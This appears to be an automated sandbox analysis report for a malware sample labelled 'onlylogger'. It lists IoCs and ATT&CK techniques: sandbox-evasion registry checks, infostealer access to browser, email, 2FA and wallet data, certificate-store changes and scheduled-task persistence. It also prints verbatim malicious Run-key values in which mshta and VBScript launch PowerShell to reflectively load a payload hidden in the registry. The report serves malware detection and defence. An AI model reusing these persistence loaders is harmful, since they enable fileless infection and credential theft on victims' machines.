onlylogger | b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24

System Information Discovery

Processes:

Install.exeResult_protected.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Result_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Result_protected.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exeRaRBFtrTBYU1Y0tjpmree9bR.exebpqsuzmp.exeCyPSXzY1M1Ivhbr6JmTc7SY5.exeResult_protected.exebuild.exeaZNvbi1qOlM2iXjLOIdGOTe7.exesetup_installer.exesotema_6.execiTtNor6DDyzdbtHN54ouYOI.exemSHXhzqCbB4jwXEZq1ycglga.exeA23L2.exeInstall.exesotema_1.exeV3ujjI6J5Cgn10sQZ2ltQJBx.exeUBGIMlfT_24VXrYTNn4S0uSp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	RaRBFtrTBYU1Y0tjpmree9bR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	bpqsuzmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Result_protected.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	aZNvbi1qOlM2iXjLOIdGOTe7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sotema_6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	ciTtNor6DDyzdbtHN54ouYOI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mSHXhzqCbB4jwXEZq1ycglga.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	A23L2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sotema_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	V3ujjI6J5Cgn10sQZ2ltQJBx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	UBGIMlfT_24VXrYTNn4S0uSp.exe

Loads dropped DLL 32 IoCs

Processes:

setup_install.exesotema_2.exerUNdlL32.eXeplrFbDYtIxqeEfatjuv652pe.exeregsvr32.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetakeown.exe7z.exe

pid	process
3104	setup_install.exe
3104	setup_install.exe
3104	setup_install.exe
3104	setup_install.exe
3104	setup_install.exe
3104	setup_install.exe
1640	sotema_2.exe
3608	rUNdlL32.eXe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4100	plrFbDYtIxqeEfatjuv652pe.exe
4140
4140
1804	regsvr32.exe
1804	regsvr32.exe
4384	7z.exe
2264	7z.exe
2512	7z.exe
6012	7z.exe
1632	7z.exe
6096	7z.exe
4116	7z.exe
444	7z.exe
1644	takeown.exe
4984	7z.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1644 takeown.exe
5124 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1644	takeown.exe
5124	icacls.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

reg.exeF1BG9.exemSHXhzqCbB4jwXEZq1ycglga.exepowershell.exeRegSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:(CreateObject(\"WSCrIPt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\\\Microsoft\\\\SkyDrive').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	F1BG9.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mdiylwlc = "\"C:\\Users\\Admin\\bpqsuzmp.exe\""	mSHXhzqCbB4jwXEZq1ycglga.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RegSvc.exe"	RegSvc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Result_protected.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Result_protected.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

57 ipinfo.io
58 ipinfo.io
182 ipinfo.io
12 ip-api.com
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Result_protected.exe

flow	ioc
57	ipinfo.io
58	ipinfo.io
182	ipinfo.io
12	ip-api.com

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

aZNvbi1qOlM2iXjLOIdGOTe7.exeIF3sualFSZNKp2Oo3vzXX3_r.exeRvDZTDbVe8cu7cHeyBtfVhCf.exe55FM6.exeH9LM9.exeBJ4F6.exeF1BG9.exe

pid	process
1344	aZNvbi1qOlM2iXjLOIdGOTe7.exe
4156	IF3sualFSZNKp2Oo3vzXX3_r.exe
4488	RvDZTDbVe8cu7cHeyBtfVhCf.exe
4988	55FM6.exe
5232	H9LM9.exe
5532	BJ4F6.exe
5872	F1BG9.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

sotema_7.exepowershell.exe

description	pid	process	target process
PID 3064 set thread context of 3928	3064	sotema_7.exe	sotema_7.exe
PID 5112 set thread context of 3836	5112	powershell.exe	RegSvcs.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 27 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3332	3608	WerFault.exe	rUNdlL32.eXe
3324	860	WerFault.exe	sotema_3.exe
4500	4364	WerFault.exe	74CIU7hguX3Rep8AcBT0owXq.exe
5240	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
5952	3616	WerFault.exe	V8mSDJYVZdnfkoOXRHQbNy2T.exe
6068	4364	WerFault.exe	74CIU7hguX3Rep8AcBT0owXq.exe
5264	4392	WerFault.exe	xQJudsUslbRDEyOqmqKmWsYK.exe
4928	4392	WerFault.exe	xQJudsUslbRDEyOqmqKmWsYK.exe
5044	3616	WerFault.exe	V8mSDJYVZdnfkoOXRHQbNy2T.exe
5928	4300	WerFault.exe	mSHXhzqCbB4jwXEZq1ycglga.exe
5328	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
3900	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
3992	1204	WerFault.exe	3yMtczVXNtqMP89LIvk7QYbS.exe
4432	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
5816	2412	WerFault.exe	bpqsuzmp.exe
5724	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
5692	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
4452	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
5836	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
5636	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
5484	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
5648	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
1596	4996	WerFault.exe	svchost.exe
5256	4308	WerFault.exe	CyPSXzY1M1Ivhbr6JmTc7SY5.exe
1892	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
5792	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
5160	4164	WerFault.exe	VZ7NTurPKHOFfMK1BrDT_Vg7.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

sotema_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe

Checks processor information in registry 2 TTPs 30 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

VZ7NTurPKHOFfMK1BrDT_Vg7.exe2a6bacde-3795-4e9f-bf7b-f95052cca579.exeplrFbDYtIxqeEfatjuv652pe.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	2a6bacde-3795-4e9f-bf7b-f95052cca579.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	2a6bacde-3795-4e9f-bf7b-f95052cca579.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	plrFbDYtIxqeEfatjuv652pe.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	plrFbDYtIxqeEfatjuv652pe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	VZ7NTurPKHOFfMK1BrDT_Vg7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	VZ7NTurPKHOFfMK1BrDT_Vg7.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4600 schtasks.exe
220 schtasks.exe
5904 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

3388 timeout.exe
6136 timeout.exe
5512 timeout.exe
4684 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4376 tasklist.exe
1888 tasklist.exe

pid	process
4600	schtasks.exe
220	schtasks.exe
5904	schtasks.exe

pid	process
3388	timeout.exe
6136	timeout.exe
5512	timeout.exe
4684	timeout.exe

pid	process
4376	tasklist.exe
1888	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

6024 taskkill.exe
4132 taskkill.exe
5260 taskkill.exe

pid	process
6024	taskkill.exe
4132	taskkill.exe
5260	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

attrib.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	attrib.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	attrib.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	attrib.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	attrib.exe

Modifies registry class 1 IoCs

Processes:

sotema_1.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ sotema_1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	sotema_1.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

F1BG9.exesotema_3.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a50f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	F1BG9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0400000001000000100000002c8f9f661d1890b147269d8e86828ca90f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b06010505070308620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d81436247f0000000100000016000000301406082b0601050507030906082b060105050703011400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000007e00000001000000080000000000cf97a737d6010300000001000000140000006252dc40f71143a22fde9ef7348e064251b181181900000001000000100000000b6cd9778e41ad67fd6be0a6903710442000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	F1BG9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 5c0000000100000004000000000800001900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181187e00000001000000080000000000cf97a737d6010b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded37f0000000100000016000000301406082b0601050507030906082b06010505070301620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d814362409000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad0400000001000000100000002c8f9f661d1890b147269d8e86828ca92000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	F1BG9.exe
